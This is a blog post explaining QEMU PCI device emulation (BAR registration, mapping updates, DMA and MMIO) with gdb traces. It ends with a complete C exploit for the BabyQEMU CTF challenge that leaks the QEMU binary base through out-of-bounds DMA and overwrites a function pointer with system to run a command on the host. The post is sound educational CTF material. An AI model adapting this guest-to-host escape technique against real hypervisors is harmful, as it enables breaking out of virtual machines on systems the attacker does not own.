Introduction
In this post, I will give an introduction of the PCI device emulation in QEMU. I will start from the function pci_register_bar. Then I will introduce the PCI bus initialization and update. Based on the information given above, I will explain how RTL8139 and MMIO are expected to work through DMA (Direct Memory Access).
I also strongly recommend reading the reference [1] and [2]. They give some other useful information for PCI device in QEMU.
Function pci_register_bar
Let’s start from the realization function in RTL8139 to start the story.
memory_region_init_io(&s->bar_io, OBJECT(s), &rtl8139_io_ops, s, "rtl8139", 0x100); memory_region_init_io(&s->bar_mem, OBJECT(s), &rtl8139_mmio_ops, s, "rtl8139", 0x100); pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_IO, &s->bar_io); pci_register_bar(dev, 1, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem);
After assigning the MemoryRegionOps to the newly allocated MemoryRegion, QEMU immediately starts to assign the those MemoryRegions to the PCI device.
Let us dig into this function and see what is going on there.
void pci_register_bar(PCIDevice *pci_dev, int region_num, uint8_t type, MemoryRegion *memory) { PCIIORegion *r; uint32_t addr; uint64_t wmask; pcibus_t size = memory_region_size(memory); assert(region_num >= 0); assert(region_num < PCI_NUM_REGIONS); if (size & (size-1)) { fprintf(stderr, "ERROR: PCI region size must be pow2 " "type=0x%x, size=0x%"FMT_PCIBUS"\n", type, size); exit(1); } r = &pci_dev->io_regions[region_num]; r->addr = PCI_BAR_UNMAPPED; r->size = size; r->type = type; r->memory = NULL; wmask = ~(size - 1); addr = pci_bar(pci_dev, region_num); if (region_num == PCI_ROM_SLOT) { /* ROM enable bit is writable */ wmask |= PCI_ROM_ADDRESS_ENABLE; } pci_set_long(pci_dev->config + addr, type); if (!(r->type & PCI_BASE_ADDRESS_SPACE_IO) && r->type & PCI_BASE_ADDRESS_MEM_TYPE_64) { pci_set_quad(pci_dev->wmask + addr, wmask); pci_set_quad(pci_dev->cmask + addr, ~0ULL); } else { pci_set_long(pci_dev->wmask + addr, wmask & 0xffffffff); pci_set_long(pci_dev->cmask + addr, 0xffffffff); } pci_dev->io_regions[region_num].memory = memory; pci_dev->io_regions[region_num].address_space = type & PCI_BASE_ADDRESS_SPACE_IO ? pci_dev->bus->address_space_io : pci_dev->bus->address_space_mem; } typedef struct PCIIORegion { pcibus_t addr; /* current PCI mapping address. -1 means not mapped */ #define PCI_BAR_UNMAPPED (~(pcibus_t)0) pcibus_t size; uint8_t type; MemoryRegion *memory; MemoryRegion *address_space; } PCIIORegion;
The main goal of this function is to attach newly allocated MemoryRegions to the PCI bus address space. This function is divided into two steps.
In the first step, it retrieves the corresponding PCIIORegion, and assigns basic information to that (r->addr = PCI_BAR_UNMAPPED and etc.).
In the second step, it assigns corresponding value to memory and address_space respectively.
The two steps above represent two important functions in pci.c: pci_qdev_realize (PCI device registration) and pci_update_mappings (PCI device update)
PCI device registration
To give a general overview of this process, I set a breakpoint at pci_qdev_realize and get the following stack trace at first hit.
Thread 1 "qemu-system-x86" hit Breakpoint 1, pci_qdev_realize (qdev=0x5555566045a0, errp=0x7fffffffd630) at /home/dango/Security/qemu/hw/pci/pci.c:1822 1822 { (gdb) bt #0 pci_qdev_realize at /qemu/hw/pci/pci.c:1822 #1 device_set_realized at /qemu/hw/core/qdev.c:1046 #2 property_set_bool at /qemu/qom/object.c:1667 #3 object_property_set at /qemu/qom/object.c:946 #4 object_property_set_qobject at /qemu/qom/qom-qobject.c:24 #5 object_property_set_bool at /qemu/qom/object.c:1015 #6 qdev_init_nofail at /qemu/hw/core/qdev.c:366 #7 pci_create_simple_multifunction at /qemu/hw/pci/pci.c:1893 #8 pci_create_simple at /qemu/hw/pci/pci.c:1904 #9 i440fx_init at /qemu/hw/pci-host/piix.c:331 #10 pc_init1 at /qemu/hw/i386/pc_piix.c:203 #11 pc_init_v2_4 at /qemu/hw/i386/pc_piix.c:489 #12 main at /qemu/vl.c:4510
It can be observed that the initialization of PCI device starts from pc_init1 function. If you still remember what I talk about in my previous post, this function is also responsible for initializing RAM memory. The initialization of PCI goes as below:
if (pci_enabled) { pci_memory = g_new(MemoryRegion, 1); memory_region_init(pci_memory, NULL, "pci", UINT64_MAX); rom_memory = pci_memory; } else { pci_memory = NULL; rom_memory = system_memory; } //some other code if (pci_enabled) { pci_bus = i440fx_init(&i440fx_state, &piix3_devfn, &isa_bus, gsi, system_memory, system_io, machine->ram_size, below_4g_mem_size, above_4g_mem_size, pci_memory, ram_memory); } else { pci_bus = NULL; i440fx_state = NULL; isa_bus = isa_bus_new(NULL, get_system_memory(), system_io); no_hpet = 1; }
After this, go deep into pci_qdev_realize to see what is happening there.
static void pci_qdev_realize(DeviceState *qdev, Error **errp) { PCIDevice *pci_dev = (PCIDevice *)qdev; PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev); Error *local_err = NULL; PCIBus *bus; bool is_default_rom; /* initialize cap_present for pci_is_express() and pci_config_size() */ if (pc->is_express) { pci_dev->cap_present |= QEMU_PCI_CAP_EXPRESS; } bus = PCI_BUS(qdev_get_parent_bus(qdev)); pci_dev = do_pci_register_device(pci_dev, bus, object_get_typename(OBJECT(qdev)), pci_dev->devfn, errp); if (pci_dev == NULL) return; //some other code }
Here, we come across the most important function of PCI initialization is do_pci_register_device, which will does almost everything about PCI device initialization.
/* -1 for devfn means auto assign */ static PCIDevice *do_pci_register_device(PCIDevice *pci_dev, PCIBus *bus, const char *name, int devfn, Error **errp) { PCIDeviceClass *pc = PCI_DEVICE_GET_CLASS(pci_dev); PCIConfigReadFunc *config_read = pc->config_read; PCIConfigWriteFunc *config_write = pc->config_write; Error *local_err = NULL; AddressSpace *dma_as; //some sanity check pci_dev->bus = bus; pci_dev->devfn = devfn; dma_as = pci_device_iommu_address_space(pci_dev); memory_region_init_alias(&pci_dev->bus_master_enable_region, OBJECT(pci_dev), "bus master", dma_as->root, 0, memory_region_size(dma_as->root)); memory_region_set_enabled(&pci_dev->bus_master_enable_region, false); address_space_init(&pci_dev->bus_master_as, &pci_dev->bus_master_enable_region, name); pstrcpy(pci_dev->name, sizeof(pci_dev->name), name); pci_dev->irq_state = 0; pci_config_alloc(pci_dev); pci_config_set_vendor_id(pci_dev->config, pc->vendor_id); pci_config_set_device_id(pci_dev->config, pc->device_id); pci_config_set_revision(pci_dev->config, pc->revision); pci_config_set_class(pci_dev->config, pc->class_id); //some check pci_init_cmask(pci_dev); pci_init_wmask(pci_dev); pci_init_w1cmask(pci_dev); if (pc->is_bridge) { pci_init_mask_bridge(pci_dev); } pci_init_multifunction(bus, pci_dev, &local_err); if (local_err) { error_propagate(errp, local_err); do_pci_unregister_device(pci_dev); return NULL; } if (!config_read) config_read = pci_default_read_config; if (!config_write) config_write = pci_default_write_config; pci_dev->config_read = config_read; pci_dev->config_write = config_write; bus->devices[devfn] = pci_dev; pci_dev->version_id = 2; /* Current pci device vmstate version */ return pci_dev; } struct PCIDevice { //other member variable AddressSpace bus_master_as; MemoryRegion bus_master_enable_region; //other member variable };
In do_pci_register_device, MemoryRegion bus_master_enable_region and AddressSpace bus_master_as is initialized accordingly.
PCI device update
Except for the PCI device that is turned on by default, there also exist newly added PCI device like RTL8139. Here comes to function pci_update_mappings to add the newly added PCI device into the PCI bus address.
static void pci_update_mappings(PCIDevice *d) { PCIIORegion *r; int i; pcibus_t new_addr; for(i = 0; i < PCI_NUM_REGIONS; i++) { r = &d->io_regions[i]; /* this region isn't registered */ if (!r->size) continue; new_addr = pci_bar_address(d, i, r->type, r->size); /* This bar isn't changed */ if (new_addr == r->addr) continue; /* now do the real mapping */ if (r->addr != PCI_BAR_UNMAPPED) { trace_pci_update_mappings_del(d, pci_bus_num(d->bus), PCI_FUNC(d->devfn), PCI_SLOT(d->devfn), i, r->addr, r->size); memory_region_del_subregion(r->address_space, r->memory); } r->addr = new_addr; if (r->addr != PCI_BAR_UNMAPPED) { trace_pci_update_mappings_add(d, pci_bus_num(d->bus), PCI_FUNC(d->devfn), PCI_SLOT(d->devfn), i, r->addr, r->size); memory_region_add_subregion_overlap(r->address_space, r->addr, r->memory, 1); } } pci_update_vga(d); }
It will traverse the list of PCIIORegion, retrieve a reserved region address for current checking slot. If the current checking slot is an unmapped PCIIORegion, it will assign the region address to the current PCIIORegion and add the region address as a subregion to the memoru_address_space.
Now, let me verify the procedure mentioned above with RTL8139 and go further into MMIO with BabyQEMU in XCTF HITB 2017.
RTL8139
My target is function pci_dma_read in the vulnerable function of CVE-2015-5165. I use the following debugging script to verify the procedure mentioned above.
set pagination off set logging redirect on set logging on break do_pci_register_device commands p/x $rdi x/s $rdx cont end break pci_update_mappings commands p/x $rdi set $name = ((struct PCIDevice *)($rdi))->name if( strcmp($name,"rtl8139")==0) bt end cont end break pci_dma_read commands p/x $rdi set $name = ((struct PCIDevice *)($rdi))->name if(strcmp($name,"rtl8139")==0) bt end cont end run -kernel /home/dango/Kernel/linux-4.15.7/arch/x86/boot/bzImage -append "console=ttyS0 root=/dev/sda rw" -hda /home/dango/Kernel/Image/image03/qemu.img -enable-kvm -m 2G -nographic -netdev user,id=t0, -device rtl8139,netdev=t0,id=nic0 -netdev user,id=t1, -device pcnet,netdev=t1,id=nic1
Then we can get the result in time order as below:
Thread 1 "qemu-system-x86" hit Breakpoint 1, do_pci_register_device (pci_dev=0x5555573cd140, bus=0x555556603910, name=0x555556371cc0 "rtl8139", devfn=-1, errp=0x7fffffffd7f0) at /home/dango/Security/qemu/hw/pci/pci.c:843 843 { $6 = 0x5555573cd140 0x555556371cc0: "rtl8139" Thread 1 "qemu-system-x86" hit Breakpoint 2, pci_update_mappings (d=0x5555573cd140) at /home/dango/Security/qemu/hw/pci/pci.c:1135 1135 for(i = 0; i < PCI_NUM_REGIONS; i++) { $13 = 0x5555573cd140 #0 pci_update_mappings (d=0x5555573cd140) at /qemu/hw/pci/pci.c:1135 #1 pci_do_device_reset (dev=0x5555573cd140) at /qemu/hw/pci/pci.c:242 #2 pcibus_reset (qbus=0x555556603910) at /qemu/hw/pci/pci.c:270 #3 qbus_reset_one (bus=0x555556603910, opaque=0x0) at /qemu/hw/core/qdev.c:318 #4 qbus_walk_children (bus=0x555556603910, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:604 #5 qdev_walk_children (dev=0x555556602040, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:629 #6 qbus_walk_children (bus=0x555556416780, pre_devfn=0x0, pre_busfn=0x0, post_devfn=0x5555557d4494 <qdev_reset_one>, post_busfn=0x5555557d44b7 <qbus_reset_one>, opaque=0x0) at /qemu/hw/core/qdev.c:595 #7 qbus_reset_all (bus=0x555556416780) at /qemu/hw/core/qdev.c:330 #8 qbus_reset_all_fn (opaque=0x555556416780) at /qemu/hw/core/qdev.c:336 #9 qemu_devices_reset () at /qemu/vl.c:1722 #10 qemu_system_reset (report=false) at /qemu/vl.c:1735 #11 main (argc=19, argv=0x7fffffffde98, envp=0x7fffffffdf38) at /qemu/vl.c:4617 Thread 4 "qemu-system-x86" hit Breakpoint 3, pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /home/dango/Security/qemu/include/hw/pci/pci.h:696 696 return pci_dma_rw(dev, addr, buf, len, DMA_DIRECTION_TO_DEVICE); $3777 = 0x5555573cd140 #0 pci_dma_read (dev=0x5555573cd140, addr=2033036384, buf=0x7fffd5405030, len=4) at /qemu/include/hw/pci/pci.h:696 #1 rtl8139_cplus_transmit_one (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:1985 #2 rtl8139_cplus_transmit (s=0x5555573cd140) at /qemu/hw/net/rtl8139.c:2412 #3 rtl8139_io_writeb (opaque=0x5555573cd140, addr=217 '\331', val=64) at /qemu/hw/net/rtl8139.c:2795 #4 rtl8139_ioport_write (opaque=0x5555573cd140, addr=217, val=64, size=1) at /qemu/hw/net/rtl8139.c:3353 #5 memory_region_write_accessor (mr=0x5555573cfb68, addr=217, value=0x7fffd54052f8, size=1, shift=0, mask=255, attrs=...) at /qemu/memory.c:450 #6 access_with_adjusted_size (addr=217, value=0x7fffd54052f8, size=1, access_size_min=1, access_size_max=4, access=0x55555564d8bc <memory_region_write_accessor>, mr=0x5555573cfb68, attrs=...) at /qemu/memory.c:506 #7 memory_region_dispatch_write (mr=0x5555573cfb68, addr=217, data=64, size=1, attrs=...) at /qemu/memory.c:1158 #8 address_space_rw (as=0x555555e96f20 <address_space_io>, addr=49369, attrs=..., buf=0x7ffff7fe9000 "@", len=1, is_write=true) at /qemu/exec.c:2451 #9 kvm_handle_io (port=49369, attrs=..., data=0x7ffff7fe9000, direction=1, size=1, count=1) at /qemu/kvm-all.c:1680 #10 kvm_cpu_exec (cpu=0x555556416c70) at /qemu/kvm-all.c:1849 #11 qemu_kvm_cpu_thread_fn (arg=0x555556416c70) at /qemu/cpus.c:979 #12 start_thread (arg=0x7fffd5408700) at pthread_create.c:465 #13 clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
In the first place, it can be observed that do_pci_register_device is to register the PCIDevice at 0x5555573cd140. Then we can see the stack trace of invoking pci_update_mappings. With the help of our debugging script we can observe that the update procedure does not take place only once. Actually, it will be updated multiple times. At the time of invoking pci_dma_read, its root MemoryRegion is address_space_io, which is for IO port communication.
Memory Mapped IO
Now let us get back to the BabyQEMU in XCTF HITB 2017. We can find something new from the binary code in pci_hitb_realize.
#define PCI_BASE_ADDRESS_SPACE_IO 0x01 #define PCI_BASE_ADDRESS_SPACE_MEMORY 0x00 pci_hitb_realize(PCIDevice *dev, Error **errp) { HITBState *s = HITB(dev); memory_region_init_io(&s->bar_mem, OBJECT(s), &hitb_mmio_ops, s, "hitb-mmio", 0x100000uLL); pci_register_bar(dev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->bar_mem); }
From the code above, we can tell that s->bar_mem will be assigned to global variable memory_address_space.
From the knowledge of the QEMU internal, the code given by KITCTF seems a little bit tedious. Here we give a simplified version of the final exploit, which removes some abundant code and check in the original write-up. In the code below, I only create a mapped memory from a device and replace the mapped dmabuf with an allocated buffer in heap. In the end, we get the same result as the write-up given by KITCTF.
#include <assert.h> #include <fcntl.h> #include <inttypes.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mman.h> #include <sys/types.h> #include <unistd.h> #define DMA_BASE 0x40000 unsigned char* iomem; unsigned char* dmabuf; uint64_t dmabuf_phys_addr; #define PAGE_SHIFT 12 #define PAGE_SIZE (1 << PAGE_SHIFT) #define PFN_PRESENT (1ull << 63) #define PFN_PFN ((1ull << 55) - 1) int fd; void die(const char* msg) { perror(msg); exit(-1); } uint32_t page_offset(uint32_t addr) { return addr & ((1 << PAGE_SHIFT) - 1); } uint64_t gva_to_gfn(void *addr) { uint64_t pme, gfn; size_t offset; offset = ((uintptr_t)addr >> 9) & ~7; lseek(fd, offset, SEEK_SET); read(fd, &pme, 8); if (!(pme & PFN_PRESENT)) return -1; gfn = pme & PFN_PFN; return gfn; } uint64_t gva_to_gpa(void *addr) { uint64_t gfn = gva_to_gfn(addr); assert(gfn != -1); return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr); } void iowrite(uint64_t addr, uint64_t value) { *((uint64_t*)(iomem + addr)) = value; } uint64_t ioread(uint64_t addr) { return *((uint64_t*)(iomem + addr)); } void dma_setcnt(uint32_t cnt) { iowrite(144, cnt); } void dma_setdst(uint32_t dst) { iowrite(136, dst); } void dma_setsrc(uint32_t src) { iowrite(128, src); } void dma_start(uint32_t cmd) { iowrite(152, cmd | 1); } void* dma_read(uint64_t addr, size_t len) { dma_setsrc(addr); dma_setdst(dmabuf_phys_addr); dma_setcnt(len); dma_start(2); sleep(1); } void dma_write(uint64_t addr, void* buf, size_t len) { assert(len < 0x1000); memcpy(dmabuf, buf, len); dma_setsrc(dmabuf_phys_addr); dma_setdst(addr); dma_setcnt(len); dma_start(0); sleep(1); } void dma_write_qword(uint64_t addr, uint64_t value) { dma_write(addr, &value, 8); } uint64_t dma_read_qword(uint64_t addr) { dma_read(addr, 8); return *((uint64_t*)dmabuf); } void dma_crypted_read(uint64_t addr, size_t len) { dma_setsrc(addr); dma_setdst(dmabuf_phys_addr); dma_setcnt(len); dma_start(4 | 2); sleep(1); } int main(int argc, char *argv[]) { int fdmem = open("/sys/devices/pci0000:00/0000:00:04.0/resource0", O_RDWR | O_SYNC); if (fdmem == -1) die("open"); iomem = mmap(0, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fdmem, 0); if (iomem == MAP_FAILED) die("mmap"); fd = open("/proc/self/pagemap", O_RDONLY); if (fd < 0) { perror("open"); exit(1); } printf("iomem @ %p\n", iomem); dmabuf = malloc(0x1000); memset(dmabuf, '\x00', sizeof(dmabuf)); dmabuf_phys_addr = gva_to_gpa(dmabuf); printf("DMA buffer (virt) @ %p\n", dmabuf); printf("DMA buffer (phys) @ %p\n", (void*)dmabuf_phys_addr); uint64_t hitb_enc = dma_read_qword(DMA_BASE + 0x1000); uint64_t binary = hitb_enc - 0x283dd0; printf("binary @ 0x%lx\n", binary); uint64_t system = binary + 0x1fdb18; dma_write_qword(DMA_BASE + 0x1000, system); char* payload = "cat flag;"; dma_write(DMA_BASE + 0x100, payload, strlen(payload)); dma_crypted_read(DMA_BASE + 0x100, 0x1); return 0; }
The last remaining question is why we need to open “/sys/devices/pci0000:00/0000:00:04.0/resource0” for MMIO. The answer lies in the pci number.
Download pciutils to our machine, and type “lspci”. We can get the following result.
root@ubuntu:~# lspci 00:00.0 Host bridge: Intel Corporation 440FX - 82441FX PMC [Natoma] (rev 02) 00:01.0 ISA bridge: Intel Corporation 82371SB PIIX3 ISA [Natoma/Triton II] 00:01.1 IDE interface: Intel Corporation 82371SB PIIX3 IDE [Natoma/Triton II] 00:01.3 Bridge: Intel Corporation 82371AB/EB/MB PIIX4 ACPI (rev 03) 00:02.0 VGA compatible controller: Device 1234:1111 (rev 02) 00:03.0 Ethernet controller: Intel Corporation 82540EM Gigabit Ethernet Controller (rev 03) 00:04.0 Unclassified device [00ff]: Device 1234:2333 (rev 10)
From the result above, we can see that ID “00:04.0” is assigned to the shared memory for our exploit. Therefore, we have to open “/sys/devices/pci0000:00/0000:00:04.0/resource0” file for exploitation.
Conclusion
In this post, I give a detailed explanation of PCI device in QEMU machine. Then I use two examples ( one in DMA and one in MMIO) to show more details in the implementation of QEMU PCI emulation.
I think this will be my last post on QEMU internal. So far I have explained every possible questions that may arise during the exploitation of QEMU.
Reference
[1] http://nairobi-embedded.org/mmap_mmio_dma.html
[2] http://nairobi-embedded.org/linux_pci_device_driver.html
Broken links on references 1 and 2!
LikeLike
Sad to see that. Maybe you can try web archive to see if there is anything you want.
LikeLike